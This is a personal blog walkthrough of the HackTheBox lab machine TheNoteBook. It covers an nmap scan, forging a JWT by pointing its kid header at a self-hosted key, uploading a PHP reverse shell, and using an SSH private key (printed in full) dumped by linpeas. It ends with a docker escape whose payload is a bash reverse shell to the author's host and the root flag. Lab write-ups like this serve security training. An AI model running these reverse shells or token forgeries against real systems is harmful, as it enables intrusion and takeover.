TheNoteBook HackTheBox Walkthrough

July 31, 2021 by Nasef

blog-feature-image

Hello everybody! I am Nasef and today I am going to show you how I hacked TheNoteBook machine from hack the box, so let’s get started!

Recon

nmap

Nmap found ssh (22), http (80)

nmap -sC -sV 10.10.10.230     
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-15 11:57 EDT
Stats: 0:01:27 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 50.00% done; ETC: 11:59 (0:00:06 remaining)
Nmap scan report for 10.10.10.230
Host is up (0.18s latency).
Not shown: 997 closed ports
PORT      STATE    SERVICE VERSION
22/tcp    open     ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 86:df:10:fd:27:a3:fb:d8:36:a7:ed:90:95:33:f5:bf (RSA)
|   256 e7:81:d6:6c:df:ce:b7:30:03:91:5c:b5:13:42:06:44 (ECDSA)
|_  256 c6:06:34:c7:fc:00:c4:62:06:c2:36:0e:ee:5e:bf:6b (ED25519)
80/tcp    open     http    nginx 1.14.0 (Ubuntu)
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: The Notebook - Your Note Keeper
10010/tcp filtered rxapi
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 93.65 seconds
http (80)

First, I made an account in the website, and made some notes to know how exactly everything works

image

I had multiple guess about exploiting this web application: -

  1. There is some hidden note which contains a credentials (Failed after multiple fuzzing)
  2. IDOR where I can access admin notes (Failed)
  3. SQL Injection (Failed)
  4. SSTI (Failed)

Then I opened the cookies and found JWT Token so I used This website to decoded it.

image

I found a key called admin_cap set to false. Maybe if we can set it to true, we can get into admin account. I tried it but it kept failing until I read This Article

It seems that the key kid is used to verify the signature, and it points to a key on the webserver.

An Attack scenario hit me

  1. Create private key openssl genrsa -out rsa.private 1024
  2. modify both admin_cap to true and kid to the private key I created python -m SimpleHTTPServer 7070
  3. Replace the generated token with original token

image

It worked!

image

I found an upload functionality, so I started reverse shell nc -lvnp 5555, then uploaded pentester monkey php reverse shell and got initial shell

nc -lvnp 5555            
listening on [any] 5555 ...
connect to [10.10.14.115] from (UNKNOWN) [10.10.10.230] 44594
Linux thenotebook 4.15.0-135-generic #139-Ubuntu SMP Mon Jan 18 17:38:24 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
 15:30:52 up  3:15,  1 user,  load average: 0.08, 0.02, 0.01
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data

Getting into noah

I’ve ran linpeas, and found and ssh keys stored in home directory of a user called noah

╔══════════╣ Analizing SSH FILES Files (limit 70)
id_dsa* Not Found                                                                                                                                                                                                                   
                                                                                                                                                                                                                   
-rw------- 1 www-data www-data 1679 Feb 17 08:59 /tmp/key/home/noah/.ssh/id_rsa
-----BEGIN RSA PRIVATE KEY-----
MIIEpQIBAAKCAQEAyqucvz6P/EEQbdf8cA44GkEjCc3QnAyssED3qq9Pz1LxEN04
HbhhDfFxK+EDWK4ykk0g5MvBQckcxAs31mNnu+UClYLMb4YXGvriwCrtrHo/ulwT
rLymqVzxjEbLUkIgjZNW49ABwi2pDfzoXnij9JK8s3ijIo+w/0RqHzAfgS3Y7t+b
HVo4kvIHT0IXveAivxez3UpiulFkaQ4zk37rfHO3wuTWsyZ0vmL7gr3fQRBndrUD
v4k2zwetxYNt0hjdLDyA+KGWFFeW7ey9ynrMKW2ic2vBucEAUUe+mb0EazO2inhX
rTAQEgTrbO7jNoZEpf4MDRt7DTQ7dRz+k8HG4wIDAQABAoIBAQDIa0b51Ht84DbH
+UQY5+bRB8MHifGWr+4B6m1A7FcHViUwISPCODg6Gp5o3v55LuKxzPYPa/M0BBaf
Q9y29Nx7ce/JPGzAiKDGvH2JvaoF22qz9yQ5uOEzMMdpigS81snsV10gse1bQd4h
CA4ehjzUultDO7RPlDtbZCNxrhwpmBMjCjQna0R2TqPjEs4b7DT1Grs9O7d7pyNM
Um/rxjBx7AcbP+P7LBqLrnk7kCXeZXbi15Lc9uDUS2c3INeRPmbFl5d7OdlTbXce
YwHVJckFXyeVP6Qziu3yA3p6d+fhFCzWU3uzUKBL0GeJSARxISsvVRzXlHRBGU9V
AuyJ2O4JAoGBAO67RmkGsIAIww/DJ7fFRRK91dvQdeaFSmA7Xf5rhWFymZ/spj2/
rWuuxIS2AXp6pmk36GEpUN1Ea+jvkw/NaMPfGpIl50dO60I0B4FtJbood2gApfG9
0uPb7a+Yzbj10D3U6AnDi0tRtFwnnyfRevS+KEFVXHTLPTPGjRRQ41OdAoGBANlU
kn7eFJ04BYmzcWbupXaped7QEfshGMu34/HWl0/ejKXgVkLsGgSB5v3aOlP6KqEE
vk4wAFKj1i40pEAp0ZNawD5TsDSHoAsIxRnjRM+pZ2bjku0GNzCAU82/rJSnRA+X
i7zrFYhfaKldu4fNYgHKgDBx8X/DeD0vLellpLx/AoGBANoh0CIi9J7oYqNCZEYs
QALx5jilbzUk0WLAnA/eWs9BkVFpQDTnsSPVWscQLqWk7+zwIqq0v6iN3jPGxA8K
VxGyB2tGqt6jI58oPztpabGBTCmBfh82nT2KNNHfwwmfwZjdsu9I9zvo+e3CXlBZ
vglmvw2DW6l0EwX+A+ZuSmiZAoGAb2mgtDMrRDHc/Oul3gvHfV6CYIwwO5qK+Jyr
2WWWKla/qaWo8yPQbrEddtOyBS0BP4yL9s86yyK8gPFxpocJrk3esdT7RuKkVCPJ
z2yn8QE6Rg+yWZpPHqkazSZO1eItzQR2mYG2hzPKFtE7evH6JUrnjm5LTKEreco+
8iCuZAcCgYEA1fhcJzNwEUb2EOV/AI23rYpViF6SiDTfJrtV6ZCLTuKKhdvuqkKr
JjwmBxv0VN6MDmJ4OhYo1ZR6WiTMYq6kFGCmSCATPl4wbGmwb0ZHb0WBSbj5ErQ+
Uh6he5GM5rTstMjtGN+OQ0Z8UZ6c0HBM0ulkBT9IUIUEdLFntA4oAVQ=
-----END RSA PRIVATE KEY-----
-rw-r--r-- 1 www-data www-data 398 Feb 17 08:59 /tmp/key/home/noah/.ssh/id_rsa.pub
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDKq5y/Po/8QRBt1/xwDjgaQSMJzdCcDKywQPeqr0/PUvEQ3TgduGEN8XEr4QNYrjKSTSDky8FByRzECzfWY2e75QKVgsxvhhca+uLAKu2sej+6XBOsvKapXPGMRstSQiCNk1bj0AHCLakN/OheeKP0kryzeKMij7D/RGofMB+BLdju35sdWjiS8gdPQhe94CK/F7PdSmK6UWRpDjOTfut8c7fC5NazJnS+YvuCvd9BEGd2tQO/iTbPB63Fg23SGN0sPID4oZYUV5bt7L3KeswpbaJza8G5wQBRR76ZvQRrM7aKeFetMBASBOts7uM2hkSl/gwNG3sNNDt1HP6Twcbj noah@thenotebook

So, I ssh’d into noah

ssh noah@10.10.10.230 -i id_rsa

Getting into Root

I ran sudo -l and found I was able to run commands in a docker container called webapp-dev01 as root without password

noah@thenotebook:~$ sudo -l
Matching Defaults entries for noah on thenotebook:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User noah may run the following commands on thenotebook:
    (ALL) NOPASSWD: /usr/bin/docker exec -it webapp-dev01*

so, I ran sudo /usr/bin/docker exec -it webapp-dev01 /bin/bash to get the root in the container

I searched for an docker escape for this case and found This Exploit

I modified the exploit to be able to make a reverse shell.

var payload = "#!/bin/bash \n bash -i >& /dev/tcp/10.10.14.115/9999 0>&1"

The started a reverse shell, and ran the exploit as explained in the README.md

nc -lvnp 9999            
listening on [any] 9999 ...
connect to [10.10.14.115] from (UNKNOWN) [10.10.10.230] 36990
bash: cannot set terminal process group (1636): Inappropriate ioctl for device
bash: no job control in this shell
<4de4eaff90e275467ff2103ff7b6eb2b1ffaf63d44f72a2b2# whoami
whoami
root
<4de4eaff90e275467ff2103ff7b6eb2b1ffaf63d44f72a2b2# cd /root
cd /rootl
root@thenotebook:/root# s
ls
cleanup.sh
docker-runc
reset.sh
root.txt
start.sh
root@thenotebook:/root# cat root.txt
cat root.txt
d656b0a679e50b99406b11816159abb1

Thank you for reading!

SAY HELLO

HELLO@IAMNASEF.COM